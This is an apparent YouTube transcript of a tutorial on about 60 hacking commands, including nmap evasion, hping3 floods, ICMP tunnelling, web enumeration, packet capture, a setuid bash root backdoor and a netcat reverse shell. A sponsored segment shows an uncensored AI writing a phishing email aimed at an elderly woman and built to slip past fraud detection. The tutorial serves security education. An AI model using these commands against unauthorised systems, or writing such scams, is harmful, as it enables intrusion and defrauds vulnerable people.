60 Hacking Commands You NEED to Know

Here are the top 60 hacking commands you need to know.

I also brought in a few experts.

So get your coffee ready.

If you want to try these commands right now, I've got a free Cali Linux sandbox and a description.

Just click that link and right here in your browser, boom, hacking environment.

Make sure you read the instructions.

You've got two hosts to hack with.

Also, all the commands in this video are in the description below.

We even created this beautiful top hacking commands cheat sheet.

You gotta have this.

The humble ping command.

We ping a host to see if it's up, and if it's up, we'll hack it.

But right now we're sending a 64 byte packet.

What do you say we send something bigger?

To test firewall capabilities, we can type in ping dash S and specify the size of our packet, testing the capabilities of a firewall.

Or we can get even crazier.

We'll still send our large packet, ping dash S 1300, but then we'll use the switch dash F

to absolutely obliterate this host flood a ton of packets and actually before we do that i want to see this happen i'll start another terminal and give you a bonus command here this tool is called if top i'll install it with apt install if top and then type in if top to run now let's flood

That's a lot of data control C to stop that same for IF top goodbye.

And actually let's keep IF top up because we're not done with ping yet.

I know you didn't realize there's so much to ping and this tool is kind of crazy.

It's called H ping three.

We'll install it with APT install H ping three, and we can do fun things like flooding packets on a specific port.

For example, port 80 H ping three dash S for a TCP packet dash V for verbose mode gives us more info dash dash flood to make it rain.

And finally the host here we go.

Go man.

Look at that.

And we're hitting port 80.

Great for testing web servers.

We can also use HP three for a fancy trace route, HP three dash dash trace route dash V. And then here's what's cool.

We'll do dash one, four ICMP packets, and then our host network, chuck.coffee.

but sometimes firewalls block ICMP with traceroute.

Removing dash 1, we can instead do dash P, 80, and dash S. Doing traceroute on port 80, which is web traffic, HTTP, using, of course, TCP.

And pick your port, maybe 443, maybe 53.

Use the DNS port, specifying dash dash UDP traffic.

Or with TCP traffic, we can add the dash A switch, setting the ACK flag, ACK.

And then change our base port with dash dash base port,

one, three, three, seven, all amazing options to help us evade firewall rules.

Now, I bet you thought we were done with ping, but we're not.

You can tunnel TCP packets over ICMP echo reply and request packets.

What?

Check this out.

It happens with a tool called ptunnel.

apt install ptunnel.

On the target side, we'll simply run ptunnel.

On the attacker side, we'll run ptunnel, dash p for proxy address, that'll be our target, dash lp to specify our local port, we'll do 8000.

dash D a for our destination address.

It'll also be our target and we'll do dash DP for our destination port.

And because I'm going to try SSH, I'll do port 22 ready set tunnel.

Now to watch this happen in real time, I'm going to show you a new command.

TCP double help us to capture and visualize these packets in real time.

We'll use APT installed TCP dump to install it.

and then we'll run tcpdump dash I for interface, and we'll say any, and we're only looking for ICMP traffic, so we'll type in ICMP.

Now watch this.

I'll launch a new terminal, and I'm gonna go over this tunnel using ICMP packets.

Oh my gosh, check this out.

SSH dash P for port, specifying 8,000, and I'll do username network chuck, that's my username at the other host, at localhost, pointing it right here on this computer, this server.

Ready, set, go.

Do you see it happening?

Oh my stinking gosh.

Literally sending SSA traffic over ICMP echo reply echo request.

That's magic.

Who am I?

IP address.

Yep, I'm somewhere else.

That's so cool.

And control C to close those tunnels on both sides.

This is great for evading firewalls that might block that type of traffic.

Here's a quick command from Tom Nom Nom.

Nom nom nom nom.

I'm Tom Nom Nom and this is a trick I use all the time.

If you're running a command and you don't know what you want to do with the output yet, pipe it to vim dash.

That'll open the output of the command in vim and then you can either manually edit it or you can use colon percent bang to run it back through any command you want.

Run it through sort to put things in order or grep dash v to remove lines you don't want.

And then as a bonus, if you have a file name under your cursor, hit g then f to open that file in a new buffer.

Nmap will scan a network helping us to discover hosts that we can hack.

Here's some fun ways to use it.

First, make sure you install it.

apt install nmap.

We can scan an entire network for quick mapping with nmap-sn and then our target network.

Hey, it found 11 hosts.

The switch lowercase S capital V will do service discovery on a target.

Works like a charm.

Use the capital O switch for OS detection.

Well, hold up.

We tried, but it's blocking ping probes.

Let's try dash PN to not do the probe.

We'll add that to our command dash capital P lowercase N bam.

We got it.

It's a windows PC.

We can use a lowercase S capital L switch to do quick host name scanning on a network and map scripts.

Unlock a whole new world.

We can scan for vulnerabilities on a host with dash dash script volume, and then our target host or network.

We can use the malware script to scan for known malware with the capital a switch.

We can scan for pretty much everything.

Take a little coffee break.

It'll take a while.

This one switch does OS detection, version detection, some default script scanning from Nmap, and the trace route.

That's a lot of info.

That's awesome.

If we use the lowercase F switch, it'll fragment our packets and make it harder for us to be detected while we're scanning.

We can also avoid detection by changing our source port.

Using the source port switch, we can just say, hey, I'm DNS, don't mind me.

And if you really wanna be tricky with Nmap, you can scan with decoys.

Check this out.

Nmap, dash capital D for decoys,

and then specify R and D all capital colon.

Let's say 10.

What that will do is generate 10 random IP addresses, random decoys that you're scanning from.

So they can't find you.

We'll put our host in and then bam scanning from 10 different IP addresses.

Now in map is cool, but what if you have a lot to scan like networks upon networks and you want to scan them fast?

That's where mass scan comes in.

Once doll mass scan with APT, install mass scan.

Mass scan is similar to in map and that we can specify ports to scan for specify a network, but then we can specify our rate.

and go super fast, just like that.

Or if we have no idea what networks we're dealing with, we can scan everything by the entire 10 dot subnet range.

And we'll do a rate of 10,000.

Now it is fast, but you still might want to take a coffee break.

Just saying.

We'll just control C that we can also use the randomized host switch to change the order in which we scan our host or networks, helping us stay a bit more hidden, or we can quickly find servers, foolishly running telnet on a network super insecure, but we can find that out right now, simply by specifying port 23 and scanning an entire network fast.

Got one.

Now here's John Hammond with something a bit silly.

but I love it though.

You normally just enter LS on the command line to list stuff in the current directory.

Well, did you know that there is actually an SL command?

Like if you were typing really fast or you accidentally made a mistake or you had a typo when you meant to type LS and you accidentally typed SL, this is the Steam locomotive.

And it is a train that is displayed on your computer screen on the command line, on the terminal.

And look, you can't get out of this.

You can't type anything.

You can't do anything.

You just have to wait for the whole train to drive by.

Now, the next fun hacking command that I want to show you is actually part of the dev piece of the file system.

I don't know if you're familiar, but there is a slash dev slash U random file.

And that is like a device to list out pseudo random data just coming from your computer, right?

Hey, you have a stream, a constant stream of randomness.

And this looks hysterical.

It is just gibberish.

Nonsense, zeros and ones and all the data up to 255 ASCII characters, printable, non-printable, and it just looks like absolute chaos.

You can control C out of this, but sometimes it might break the terminal and you can't actually continue to interact with the shell.

So it's something that you might be able to do as a troll.

as a meme right so what if we actually set an alias for that same ls command maybe we could set that to sl if we wanted to run the steam locomotive train again but we could set that to cat devu random and now anytime someone were to actually enter ls on the command line thinking that they're gonna list files it'll just spit up and go crazy with all that random gibberish and nonsense

I think that's kind of fun.

By the way, John Hammond will show us a real hacking command he loves later in the video.

The whois command will tell you a ton of stuff about a domain.

Install it with apt install whois.

Whoismicrosoft.com.

Fax number, phone number, address.

Let's try cia.gov.

redacted should have expected that what web will tell you what technologies a website is using APT, install what web to install it.

And then we'll type in what web and our domain.

We'll try network chuck.coffee.

And while it's scanning perfect time for a coffee break.

It gives you a ton of information, including the fact that it's powered by Shopify right there.

Next up, curl from Nahumsec.

My favorite command is actually not using any hacking tools.

And it's probably one of the most basic commands used on Linux.

And it comes by default on almost any operating system.

And that is a curl command.

And let me show you real quickly how I use it.

The first thing I want to do is usually I just want to do a curl dash I.

That usually gives you the headers and every response in that header.

of what it is coming back from the server so in this case it's giving us a 302 and it's saying hey you are going to get redirected to this exact location and i like doing curl a lot because i'm hacking a lot of apis most of the time and with apis i want to just quickly see if an endpoint is accessible or if i can fit some sort of a data and a lot of times i'm processing data as a part of my hacking recon so it makes it a lot easier to do it through curl and what you want to do for this one for example if you want to authenticate instead of launching your browser and

saying this header manually, all you have to do is you can pass a header and set that custom header with its token in there and run it and it will authenticate you and give you whatever data it is that you're looking for on that API.

Hey, real quick, can I show you something crazy?

Check this out.

I'm about to run an uncensored version of ChatGPT or an LLM.

which means you can pretty much do whatever you want to do with it.

Now, why am I doing this?

Well, because Bitdefender just came out with a tool called Scamio.

It's a free AI powered scan detector and prevention service from Bitdefender.

Like legit, check this out.

I got a text from a scam.

I'm pretty sure it is, but do I actually know?

Let me go find it.

Oh, yep.

Here's one.

Pretty sure this is a scam, but do I know all I gotta do is copy that sucker and jump into Facebook messenger.

Just one of the places I can chat with Bitdefender Scamio and see if things are scams.

So let's try it out.

Hey, is this a scam again?

This is totally free.

I'm just chatting with it here in Facebook messenger.

And within seconds, it told me that, Hey, it might be kind of suspicious.

Don't do anything with it.

Okay.

That's pretty cool.

That didn't fool it.

But what if I had this uncensored AI tool, try to produce a phishing message?

Can we trick it?

Let's try it out.

I need you to write a very convincing fishing email for an elderly woman named Deborah.

The goal is to get her to give me some money, use the best method, you know, and write it in a way that will avoid spam and fraud detection.

Let me add that.

And fraud detection snap.

Okay.

That's pretty good.

It even added this at the end.

It's awesome.

Okay.

Let's doctor it up just a little bit or move like the, uh, it's not a real URL thing right there.

Let's add like a real looking number, like seven, six, five, zero, nine, eight, seven.

And I'll remove the not a real number thing here to get cool.

Our message is ready.

Let's test it out.

Please tell me if this email is okay.

Now, while it's checking that, think about this, who in your family or in your friend group could benefit from having something like this.

I can't tell you how many times I'm getting a text from my grandma or my mom going, Hey, is this a scam?

Is this fraud?

But if they can chat with something that is honestly probably smarter than me and will be up to date with the latest scams, it's actually powered by a bit defender, the excellent security suite that I've talked about here on this channel a lot.

So all the information and knowledge they have is feeding the scam.

Yo free AI powered tool.

okay the results are in the email does seem suspicious it tells you what tactics it might be using and it tells you to contact your bank directly that's perfect that's what i would tell my grandma or my mom or my dad so seriously try it out right now check the link below it's free just you can chat with it here in the website or chat with a messenger they'll be adding whatsapp soon and it'll check lots of things like you can send a qr code and go hey is this good

You can send that pictures of stuff.

This is a crazy powerful and free tool.

I love what Bitdefender is doing.

So again, definitely check it out.

And thank you to Bitdefender for sponsoring this video and making a really awesome free tool available to all of you guys.

Nikto is an open source web server scanner.

That'll scan websites for any dangerous, bad stuff.

It might have to install it.

We'll do APT install Nikto.

And for a basic vulnerability scan, we'll do Nikto dash H for our host and specify our host network, Chuck,

GoBuster can be used to find directory and files on a web server.

We'll install it with apt install gobuster.

To enumerate networkchuck.com, we'll do gobuster, type in dir for directories, that's the node we're gonna be in.

We'll type in dash u and specify our domain.

network chuck.com and we'll use the dash W to specify our word list.

I'll use a default Cali Linux one here and go.

And it's discovering all my direct reason files.

Now because go buster is written and go is extremely fast subdomain enumeration.

Yeah, we can use it for that.

But first we want to download a word list to get a ton of word lists right now on your system.

We'll use the tool called sec list, APT install sec lists.

Fair warning, this is pretty big.

Lots of word lists.

Once it's done downloading, you can find it in User, Share, Seclist.

Lots of stuff in there.

Now real quick, if you only want to download one thing, the thing that we care about, there's a command for that.

It's called wget.

Seclist is also on GitHub, and it's maintained by my friends.

What we care about is discovery and DNS.

And we'll get Jason Haddock's list here.

I'm gonna grab the raw URL.

To install wget apt install wget, kind of seeing a pattern here, right?

Type in wget, paste that URL,

W got it.

Now getting back to go buster.

We can enumerate domains.

We'll type in go buster.

It'll be DNS.

We'll specify our domain with dash D network chuck.com.

And then our word list with dash W I'll use Jason Haddock to DNS ready, set, go.

Now that's a pretty big list.

And if I were doing a legit pen test, I probably let this finish out, but I don't have time for that.

I'm not patient enough.

Control C to stop that.

I want to show you another way to do subdomain enumeration.

This tool is called sub Lister.

You can install it with APT install sub Lister, just like this.

And the E is a three.

And then to run sub Lister, we'll simply type in sub Lister dash D to specify our domain network chuck.com and let it go.

And it found a lot of stuff.

This next one is pretty fun.

It's called WP scan.

It will scan WordPress sites and help you find all the issues that might be affecting it.

Great.

If you're a WordPress site,

owner and great.

If you're a pen tester, let's try it out.

We can run it in a few ways.

The first way WP scan, we'll do dash dash URL and specify our URL.

We'll do chuckkeith.com my personal website.

That's not doing anything.

And then we'll do dash dash enumerate you, not you.

The letter you, the U stands for users.

Let's try it out.

That's a lot of information.

We can also use the P option for plugins.

We can use T for themes or do something pretty aggressive.

We'll do VP.

vt dash dash plugins dash detection.

And we'll add aggressive at the end, just to make sure we get our point across.

This is a super aggressive vulnerability scan.

Let's try it out.

Now you may have noticed that all of those commands did not output anything fun because you need an API token from WP scan, which you can get for free right now.

And then you would run the commands like this, specifying your API token.

with the dash dash API dash token switch.

Amass is another tool you can use for subdomain enumeration.

Install it with apt install, and to run it we'll type in amass, type in enum dash d to specify our domain, network chuck.com, and let it go.

This tool might run forever,

I don't wanna wait for it though.

Control C to stop that, but man, look at all the stuff I found.

To do a more passive enumeration, you can do this, amass enum, and we'll specify dash passive, and then our domain.

Whereas the other one was a bit more active.

I like amass because it does give us options based on what our scope is.

And we'll go ahead and stop that.

This next command opens up the door to new commands.

What does that mean?

You'll see, it's a tool called Git, which we'll often use when you first start out to interact with GitHub.

Let me show you.

There's a tool we're about to use called Searchploit.

But the way we use this tool is by downloading it from GitHub.

And actually I lied.

This is a GitLab repository, but it's pretty much the same thing.

You'll use Git all the time to install all kinds of stuff.

But first we have to install Git.

apt install git.

You probably already have it.

And then probably my favorite command is git clone.

We're gonna clone a tool onto our computer.

And in our case, it will be searchploit.

Let's go.

To properly use that command, we'll add a symbolic link.

We're not gonna talk about that.

Just know it's a command below.

And then finally, we can use the command searchploit, right?

Yeah, it's gonna work.

Let's try searching for WordPress plugins.

It'll search for exploits that involve WordPress plugins.

What about SSH?

A ton of exploits pertaining to SSH.

Super handy tool.

If you want to update the database, search exploits-eu.

Crazy powerful tool.

Now here's John Hammond with a real hacking command.

It's kind of awesome.

Let me get into the real genuine ethical hacking and penetration testing.

My favorite top hacking command.

Here's the thing.

When you're on the command line interacting with the shell, you're actually running this program called Bash or the born again shell.

Now that lives on the file system in slash bin bash.

So if I were to actually execute this, it doesn't look like it does anything.

I just get the prompt back because I've just invoked and I'm running a shell or terminal inside my shell.

So I could exit out of that and get back to my original prompt, but binbash actually takes a special argument called tacp, and that will enforce and maintain setuid permissions, which means that the owner of the file, root in this case, the admin absolute controller of the computer, will be able to keep their permissions.

but it has to be a set UID binary.

So the way that we could do that is actually change mod or CH modifications, change modifications on the file and add or plus the S letter for set UID.

We'll put that on binbash, and this will require some root privileges.

That means that you need to be the admin to be able to configure this, but what that ultimately does is create a backdoor, where you have a persistence mechanism, a little bit of a foothold, so that at any point, if we configure this with our pseudo password, later on down the line, you get access to this machine one more time.

Now you can just run bashtacp,

and you are root.

You control the whole machine because you are the admin user.

You set up that back door.

If you wanted to, you could move into the root directory and you could do anything that you want.

Maybe we could echo hello into a please subscribe to network chuck.

I'll hit enter on that.

And now if I zoom out, let me show you this, lstackla, we can see our file right there.

Please subscribe to Network Chuck.

Hey, just owned and controlled by the root user.

And we were able to configure that with our backdoor sudo chmod plus s bin bash.

That is my favorite top hacking command because then you've got a backdoor.

You've got a persistence mechanism and a way to become root at any point.

I hope you enjoyed a couple of those really neat, hey, top hacking commands, but thank you so much, Network Chuck, for letting me join the party here.

This was an absolute blast.

Now, I'm gonna do something bad.

I'm gonna do the same command twice.

What?

No, I know, it's okay.

We're gonna talk about tcpdump again.

Why?

Well, because there's more cool stuff about it and we didn't give it enough time.

We'll type in tcpdump, we'll type in dash w to send it to a file.

We'll just call it capture.pcap.

Then dash i for our interface, and we'll do ethernet zero.

That's the one I have now.

Let me just make sure that's the case.

IP address, yes, ethernet zero.

And go.

Now we'll generate some traffic.

Do something fun that we've already learned.

Nmap with random addresses.

We'll stop that with control C. We can analyze that traffic with this command, tcpdump-r, specify our capture file, which is capture.pcap.

Let's take a look.

Cool, we can see it.

We can also limit the amount of packets we capture with tcpdump and the switch dash C for count, and we'll say like 100.

That did not take long.

Now tcpdump is pretty cool.

Great for quick captures, but the real tool you wanna use.

that's crazy powerful is Tshark, the command line brother of Wireshark.

To install Tshark, we'll do apt install Tshark.

Tshark can do a lot, let's try a few things.

First we'll type in Tshark, and we'll capture one packet, just one.

We'll put it in verbose mode with dash capital V,

We'll do dash C for count, we'll do one, and then dash I, ethernet zero.

One packet captured, and then look at all the stuff it shows us.

That is so powerful.

Networking geeks are just drooling, so yes, I'm drooling.

Do you wanna see something crazier?

Filters, watch this.

Tsharp, we'll do a dash Y to apply a display filter, and with a single quote, we'll specify it.

We'll do http.request.method, space, equals, equals, and a double quote to get, and then close it out with a single quote.

I know it's kinda wordy, but check this out.

Let's specify our interface.

you

Hit the net zero and we're now capturing and only showing get request.

How cool is that?

Let's generate some curlacademy.networkchuck.com.

There's another one.

That's so cool.

Now one of the most powerful ways we can use Tshark is by analyzing packet captures.

So let's do a capture real quick to a file, Tshark, and actually no, I'm gonna show you one cool thing.

We'll use a command called timeout and put in 15 seconds and it will timeout or stop this packet capture in 15 seconds.

That's pretty cool.

Tshark.

dash i if they're not zero.

And with the dash w command, similar to tcpdump, we'll send that to a file.

Tshark dash pcap.

Let me try to generate some quick traffic.

And done.

To display statistics and specifically to follow endpoint connections, use this command, tshark dash r. We'll specify our capture, which was tshark dot pcap.

Then we'll use the switches dash qz and specify endpoints comma ip.

How cool is that?

We can also follow a TCP stream with tshark-r, our capture, dash QZ, and we'll say follow, comma, TCP, and we'll put that in ASCII.

So ASCII, we'll do comma, we'll follow the seventh stream.

That's pretty cool.

Let's try, I don't know, the first stream.

First stream's crazy.

Let's do the 20th stream.

100th stream.

So powerful.

We could also simply do custom output of fields based on the capture we're reviewing.

Check this out.

Tshark.

Do a dash E, IP dot source.

Dash E, IP dot dest, or DST.

Dash E, frame dot protocols.

Notice we're specifying fields.

We'll do a dash T, fields, which is telling it to only output the fields we're specifying.

And then finally dash R specifying your capture.

How cool is that?

So powerful.

This is my new favorite tool, tmux, a terminal multiplexer.

Install tmux with apt install tmux.

And then simply type in tmux.

We suddenly have a new terminal that we can do stuff in, like pingingacademy.networkcheck.com.

Leave that there, hit control B and then D on your keyboard.

You're detached from it, and then with tmux A,

Get right back to it.

How powerful is that?

I'll stop this type of exit to close that out.

We can create multiple sessions and name them.

So TMUX new dash S and name it Bob.

Here's Bob.

We'll ping something here.

Detach from that.

Create another session.

Susie.

And if I type in TMUX LS, I've got two sessions and I can reattach to either of them.

TMUX A dash T to specify my target will say Susie.

jumping right back in there.

I can hit control B and then W to quickly jump between my various TMUX sessions.

And I can leave, go to another computer, jump back in here, and connect to any one of these sessions.

If you wanna learn more, I did a whole video on TMUX right up here.

SSH, we use it all the time to remote into our systems.

So for example, this Ubuntu guy.

To jump into him, I'll use SSH.

SSH.

network chuck at his IP address.

Already cool, but it can do more.

Instead of logging in, I can actually just run a command via SSH on another system.

With SSH, network chuck at my server.

And then right after that, specify the command I want to run.

So in single quotes, I can say, who am I?

Bam.

Or IP address.

crazy powerful let's get crazier you can actually make it a socks proxy what watch this before i create the tunnel let me demonstrate my location right now what's my ip address i'm in dallas texas as you can see right here but if i use this crazy ssh command i'll create a proxy and tunnel myself somewhere else ssh dash d which is telling it to create a socks proxy and i'll say port 1337 we'll do a dash c for compression dash q for quiet mode and dash n to not execute any commands

And finally, our server information.

Root, at, and this will be a server in Japan.

Put our password in.

Now we're gonna launch Chromium using that proxy.

Our SOCKS5, the local host.

Ready, set, go.

Chromium's launched.

Now let's see where we are.

It's already feeling a bit different.

And given that I'm having a hard time figuring out where to go, I'm definitely in Osaka, Japan.

Super cool, right?

Netcat, our go-to for reverse shells.

To install Netcat, we'll do apt install netcat-traditional.

To verify, just type in NC-H. And with Netcat installed on both your attacking computer and your target computer, let's do a reverse shell.

On the attacker, all we gotta do is wait.

Wait for the shell.

Type in NC-LDP and the port you're waiting on, 1337.

We're waiting, because on a reverse shell, the target reaches out to us.

On the target side, we'll type in NC for Netcat.

We'll do a dash E and specify the shell we wanna have access to.

So we'll do forward slash bin, forward slash sh, specify our attacker IP, which is us, and the port, 1337, that the attacker is listening on.

And then we'll hit enter, and something happened?

It sure stinkin' did, check it out.

I'm on the other computer.

I've got a reverse shell.

Now you can also do a fun thing where you just set up a simple chat server with Netcap.

Why?

I don't know, but you can do it.

You should try it, it's fun.

On one side, you type in NC-LVP, set a port.

On the other side, type in NC-V, the IP address of the other computer, and the port.

So now I can say, hey, and I get hey on the other side.

What are you thinking about?

the end of this video.

Me too.

I'll catch you guys next time.

For real though.

Bye.